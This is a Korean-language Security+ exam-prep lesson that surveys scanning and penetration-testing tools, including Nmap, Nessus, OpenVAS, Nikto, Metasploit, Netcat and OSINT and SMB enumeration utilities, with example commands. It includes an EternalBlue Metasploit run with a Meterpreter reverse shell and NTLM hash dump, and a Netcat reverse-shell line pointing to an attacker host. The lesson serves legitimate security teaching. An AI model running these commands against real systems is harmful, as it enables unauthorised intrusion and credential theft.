일반적인 검사 도구: Nessus, OpenVAS, Nmap
호스트 검색, 포트 검사, 취약점 식별에 사용되는 업계 표준 도구를 직접 다뤄 보며 익숙해집니다.
일반적인 검사 도구: Nessus, OpenVAS, Nmap은(는) CoddyKit의 무료 Cloud & IT Cert Prep 강의입니다. 이것은 4개 중 2번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cloud & IT Cert Prep 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cloud & IT Cert Prep 강의에는 총 4개의 강의가 포함되어 있습니다.
스캐닝 도구 생태계
Security 전문가는 호스트 탐색, 포트 스캐닝, 서비스 열거, 운영 체제 탐지, 취약점 식별, 웹 애플리케이션 테스트 등 다양한 목적에 여러 스캐닝 도구를 사용합니다. Security+에서는 각 범주에서 가장 널리 사용되는 도구를 알고 있어야 합니다. 각 도구가 무엇을 할 수 있고 무엇을 할 수 없는지 이해하면 주어진 Task에 적합한 도구를 선택하고 Results를 올바르게 해석하는 데 도움이 됩니다. 서로 보완적인 여러 도구의 Results를 함께 사용하면 단일 도구만 사용할 때보다 더 완전한 범위를 검사할 수 있습니다.
Nmap: 네트워크 매퍼
Nmap(Network Mapper)은 네트워크 탐색과 Security 감사에 가장 널리 사용되는 오픈 소스 도구입니다. 활성 호스트를 찾고, 열린 포트를 열거하며, 실행 중인 서비스와 VERSION을 탐지하고, 운영 체제를 식별할 수 있습니다. Nmap은 다양한 스캔 기법을 사용하며, 여기에는 SYN scan(Default이며 빠르고 비교적 은밀함), TCP Connect(전체 핸드셰이크를 수행하므로 더 많은 흔적을 남기지만 root 권한이 필요하지 않음), UDP scan, VERSION scan이 포함됩니다. Nmap에는 취약점 탐지, 무차별 대입, 악용을 위한 수백 개의 스크립트를 제공하는 Nmap Scripting Engine(NSE)이 포함되어 있습니다.
# Common Nmap scan types:
nmap -sS 192.168.1.0/24 # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10 # TCP connect scan
nmap -sU -p 53,67,161 target # UDP scan specific ports
nmap -sV 192.168.1.10 # version detection
nmap -O 192.168.1.10 # OS detection
nmap -A 192.168.1.10 # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10 # scan all 65535 ports
nmap --script vuln 192.168.1.10 # run vulnerability scriptsNmap 출력 및 해석
Nmap 출력을 올바르게 해석하는 것은 필수적인 기술입니다. 각 줄은 상태가 표시된 포트를 나타냅니다(열림: 서비스가 수신 대기 중임, 닫힘: 호스트가 응답했지만 수신 대기 중인 것이 없음, 필터링됨: 응답이 없거나 ICMP에 연결할 수 없으며 방화벽이 있을 가능성이 높음). 또한 프로토콜과 탐지된 서비스/VERSION도 표시됩니다. 열린 포트는 잠재적인 공격 표면을 나타냅니다. 호스트에서 예상하지 못한 열린 포트가 발견되면 침해 또는 무단 서비스가 있음을 의미할 수 있습니다. -oN, -oX, -oG 플래그는 출력을 일반, XML, grep 가능 Format으로 저장합니다. 출력 저장은 문서화와 시간에 따른 스캔 비교에 매우 중요합니다.
# Sample Nmap output:
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.2p1 Ubuntu
# 80/tcp open http Apache 2.4.41
# 443/tcp open ssl/http Apache 2.4.41
# 8080/tcp open http Jetty 9.4.39
# 3306/tcp open mysql MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)
# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xmlNessus: 엔터프라이즈 취약점 Scanner
Nessus(Tenable 제공)는 가장 널리 배포된 상용 취약점 Scanner입니다. CVE, 구성 Checks, 규정 준수 기준(CIS, DISA STIG), 악성 코드 탐지를 다루는 100,000개 이상의 Plugins를 포함한 플러그인 아키텍처를 사용합니다. Nessus는 제공된 Credentials로 시스템에 로그인하여 설치된 소프트웨어 VERSION, 레지스트리 키, 구성 File을 검사하는 Credentialed scan을 수행하므로, 인증되지 않은 네트워크 프로빙보다 훨씬 정확한 Results를 제공합니다. Nessus는 CVSS 점수, 취약점 Description, Remediation 권고 사항을 포함한 상세 보고서를 생성합니다. 무료 Nessus Essentials 버전은 최대 16개의 IP를 스캔합니다.
# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)
# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High (CVSS 7.0-8.9): privilege escalation, severe data exposure
# Medium (CVSS 4.0-6.9): local privilege escalation, information disclosure
# Low (CVSS 0.1-3.9): minimal impact, hardening issues
# Info: configuration data, no immediate riskOpenVAS: 오픈 소스 취약점 스캐닝
OpenVAS(Open Vulnerability Assessment System)는 Greenbone Networks가 유지 관리하는 무료 오픈 소스 취약점 Scanner입니다. 상용화되기 전 원래 Nessus에서 파생된 커뮤니티 지원 포크입니다. OpenVAS는 Nessus Plugins와 유사한 NVT(Network Vulnerability Tests)를 사용합니다. Greenbone Community Edition(GCE)은 웹 기반 관리 인터페이스인 Greenbone Security Assistant를 제공합니다. OpenVAS는 라이선스 비용 때문에 상용 도구를 사용할 수 없는 환경에서 널리 사용됩니다. 무료로 제공되면서도 Nmap보다 폭넓은 기능을 갖추고 있어 소규모 조직, 학술 환경, Security 실습 환경에서 일반적으로 선택됩니다.
# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup # initial setup (takes time to download feeds)
gvm-start # start OpenVAS services
# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report
# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."Nikto: 웹 서버 취약점 Scanner
Nikto는 위험한 File, 오래된 소프트웨어 VERSION, 서버 구성 문제, 일반적인 웹 취약점을 검사하는 오픈 소스 웹 서버 Scanner입니다. 안전하지 않은 HTTP 메서드, 누락된 Security 헤더, 노출된 관리자 인터페이스, Default Credentials, 일반적인 CGI 취약점 등 6,700개가 넘는 알려진 문제를 테스트합니다. Nikto는 많은 흔적을 남기며 은밀한 동작을 목적으로 설계되지 않았습니다. Target에 상당한 로그를 생성합니다. Nessus와 OpenVAS가 깊이 다루지 못할 수 있는 웹 특화 Checks를 제공하여 네트워크 수준 Scanner를 보완합니다. 항상 테스트 권한이 있는 시스템에서만 Nikto를 사용하십시오.
# Nikto web scan examples:
nikto -h 192.168.1.10 # basic scan
nikto -h https://192.168.1.10 # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443 # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html # save report
# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)Metasploit Framework
Metasploit Framework는 익스플로잇, 페이로드, 보조 모듈, 사후 익스플로잇 도구 데이터베이스를 제공하는 가장 널리 사용되는 침투 테스트 플랫폼입니다. Security+ 응시자는 Metasploit을 사용해 본 적이 없더라도 Metasploit이 무엇이며 침투 테스트에서 어떤 역할을 하는지 이해해야 합니다. Metasploit 모듈에는 익스플로잇(취약점을 이용하는 코드), 페이로드(성공적인 익스플로잇 이후 실행되는 셸 코드로, Meterpreter 등이 있음), 보조 모듈(익스플로잇 없이 스캐닝, 퍼징, 열거를 수행), 사후 모듈(최초 접근 이후 권한 상승, Credential 덤프, 측면 이동에 사용)이 포함됩니다.
# Metasploit Framework basic workflow:
msfconsole # start Metasploit
search eternalblue # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info # show exploit details
set RHOSTS 192.168.1.10 # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # attacker IP
run # execute exploit
# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump # dump NTLM hashesNetcat: 스위스 아미 나이프
Netcat(nc)은 TCP 또는 UDP를 사용해 네트워크 연결을 통해 데이터를 읽고 쓰는 단순하지만 다재다능한 유틸리티입니다. 보안 업무에서 손상된 호스트에 Reverse shell을 설정하거나, 네트워크 구간 간에 파일을 전송하거나, Port를 스캔하거나, 테스트를 위한 간단한 네트워크 수신기를 만들거나, 서비스 버전을 식별하기 위해 Banner를 수집하는 등 무수히 다양한 용도로 사용할 수 있습니다. 거의 모든 Linux 시스템에서 사용할 수 있고 사용법도 간단하므로 정상적인 관리 작업과 Attacker 도구 모음에서 모두 자주 사용됩니다. 따라서 탐지 관점에서도 이해해야 할 중요한 도구입니다.
# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22 # grab SSH banner
nc -v 192.168.1.10 80 # grab HTTP banner
# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded
# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash
# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender: nc receiver_ip 9999 < file.txtRecon-ng 및 OSINT 도구
Recon-ng는 OSINT(공개 출처 정보) 수집을 위해 설계된 Web 정찰 프레임워크입니다. Shodan, Bing, HaveIBeenPwned, DNS 레코드, LinkedIn, WHOIS 및 Certificate transparency logs와 같은 공개 출처를 조회하는 모듈을 사용해, 능동적인 Scanning을 시작하기 전에 Target에 관한 정보를 수집합니다. Penetration 테스트의 정찰 단계는 일반적으로 OSINT로 시작하여 Target의 네트워크 토폴로지, 직원 이름, 이메일 형식, 사용 기술 및 공개적으로 노출된 자산을 파악합니다. 양질의 OSINT를 수행하면 능동적인 Scanning만으로 찾을 때보다 훨씬 오래 걸릴 수 있는 공격 경로를 발견할 수 있습니다.
# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com
# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com
# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'
# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin
# 5. Certificate transparency:
crt.sh/?q=%.example.com (reveals subdomains via certs)Enum4linux를 사용한 네트워크 열거
Enum4linux는 null 세션과 MSRPC를 사용해 Windows 호스트 및 Samba(Linux SMB) 서버에서 정보를 열거합니다. 사용자 이름, 그룹 구성원, 공유, Password 정책 및 작업 그룹 정보를 추출합니다. 내부 Penetration 테스트에서 enum4linux는 Password spraying에 사용할 수 있는 사용자 계정과 환경의 공유 구조를 빠르게 드러낼 수 있습니다. 최신 Windows 버전은 기본적으로 null 세션 액세스를 제한하지만, 잘못 구성된 환경에서는 상당한 정보가 노출되는 경우가 많습니다. 인증된 열거에는 Impacket의 samrdump.py와 CrackMapExec에서도 유사한 기능을 사용할 수 있습니다.
# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10 # all enumeration
enum4linux -U 192.168.1.10 # users only
enum4linux -S 192.168.1.10 # shares only
# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares
# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10작업에 적합한 도구 선택
Security 전문가는 작업에 맞는 도구를 선택합니다. 호스트 검색 및 Port Scanning에는 Nmap을 사용합니다. 대규모 Vulnerability 식별에는 Nessus(상용) 또는 OpenVAS(무료)를 사용합니다. Web 서버 Vulnerability에는 Nikto를 사용합니다. Web 애플리케이션 공격에는 Burp Suite를 사용합니다. Exploitation에는 Metasploit을 사용합니다. OSINT 정찰에는 Recon-ng, theHarvester, Shodan을 사용합니다. 네트워크 트래픽 분석에는 Wireshark와 tcpdump를 사용합니다. 무선 공격에는 Aircrack-ng suite를 사용합니다. Security+ 시험에서는 이러한 도구의 개념적 지식을 평가하므로, 각각을 직접 다뤄 본 경험이 없더라도 어떤 용도로 사용하는지는 알고 있어야 합니다.
빠른 확인
이 lesson에서 다룬 CompTIA Security+ (SY0-701) 개념에 대한 이해도를 확인해 보세요.
Lesson 요약
이 lesson에서는 다음을 배웠습니다. Nmap은 호스트 검색, Port Scanning 및 버전 탐지의 기반이며 추가 기능을 제공하는 풍부한 스크립팅 엔진을 갖추고 있습니다. Nessus와 OpenVAS는 알려진 CVE에 대해 종합적인 Vulnerability Scanning을 수행하며, 정확도를 높이려면 인증된 액세스를 사용합니다. Metasploit은 Penetration 테스터가 Vulnerability를 실제로 Exploitation할 수 있는지 확인하고 실제 공격 Impact를 보여 줄 수 있도록 Exploit 프레임워크를 제공합니다. 다음에는 Reconnaissance부터 Reporting까지 전체 Penetration 테스트 수명 주기를 살펴봅니다.
자주 묻는 질문
“일반적인 검사 도구: Nessus, OpenVAS, Nmap” 강의는 무료인가요?
네 — “일반적인 검사 도구: Nessus, OpenVAS, Nmap” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cloud & IT Cert Prep 강의 전체를 잠금 해제할 수 있습니다. Cloud & IT Cert Prep 강의에는 총 4개의 강의가 포함되어 있습니다.
“일반적인 검사 도구: Nessus, OpenVAS, Nmap”에서 뭘 배우나요?
호스트 검색, 포트 검사, 취약점 식별에 사용되는 업계 표준 도구를 직접 다뤄 보며 익숙해집니다. 브라우저에서 직접 실행하는 실습 코드로 Cloud & IT Cert Prep을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cloud & IT Cert Prep을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cloud & IT Cert Prep은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 2번째 강의입니다.
“일반적인 검사 도구: Nessus, OpenVAS, Nmap” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cloud & IT Cert Prep 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cloud & IT Cert Prep 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.
이 강의의 모든 강의
- 취약점 검사와 침투 테스트
- 일반적인 검사 도구: Nessus, OpenVAS, Nmap
- 침투 테스트 단계: 정찰부터 보고까지
- CVSS 점수 산정과 취약점 우선순위 지정